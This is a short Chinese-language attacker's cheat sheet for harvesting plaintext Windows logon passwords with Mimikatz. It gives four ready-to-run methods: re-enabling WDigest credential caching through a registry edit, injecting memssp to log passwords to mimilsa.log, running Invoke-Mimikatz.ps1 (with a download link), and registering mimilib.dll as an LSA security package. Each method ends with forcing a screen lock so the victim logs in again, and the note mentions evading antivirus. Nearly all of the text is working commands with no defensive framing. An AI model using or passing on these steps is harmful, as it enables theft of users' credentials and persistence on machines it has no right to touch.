0x01 改注册表(mimitaze存在免杀问题)

ps:需要锁屏等方式
修改成记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Mimikatz 获取 Windows 高版本明文密码 - 图1
修改不记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
锁屏
rundll32.exe user32.dll,LockWorkStation
修改完之后使用命令锁屏,接下来等待用户再次登录一次就可以抓到了
Mimikatz 获取 Windows 高版本明文密码 - 图2

0x02 Mimikatz 插 ssp 记录密码

ps:需要锁屏等方式
使用mimikatz的一个功能:
privilege::debug、misc::memssp
修改完之后使用以下命令锁屏,等用户进入后就可以在C:\Windows\System32\mimilsa.log里面存储登录的密码
rundll32.exe user32.dll,LockWorkStation
Mimikatz 获取 Windows 高版本明文密码 - 图3

0x03 使用 Invoke-Mimikatz.ps1

ps:需要锁屏等方式
Import-Module .\Invoke-Mimikatz.ps1 //导入命令 Invoke-Mimikatz -Command “misc::memssp” //不需要重启获取 记录的明文密码存储在这个路径下
Invoke-Mimikatz.ps1
https://download.cisp-pte.com/安全工具/Mimikatz/mimidogz-master.zip
Mimikatz 获取 Windows 高版本明文密码 - 图4

0x04 复制mimilib.dll+修改注册表

ps:需要重新启动系统
(1) 在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll
Mimikatz 获取 Windows 高版本明文密码 - 图5
(2) 将对应版本的dll文件复制到 c:\windows\system32下
(3) 将以下注册表位置中Security Packages的值设置为mimilib.dll
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v “Security Packages” /t REG_MULTI_SZ /d mimilib.dll /f
(4) 等待系统重启后,在c:\windows\system32生成文件kiwissp.log,记录当前用户的明文口令
Mimikatz 获取 Windows 高版本明文密码 - 图6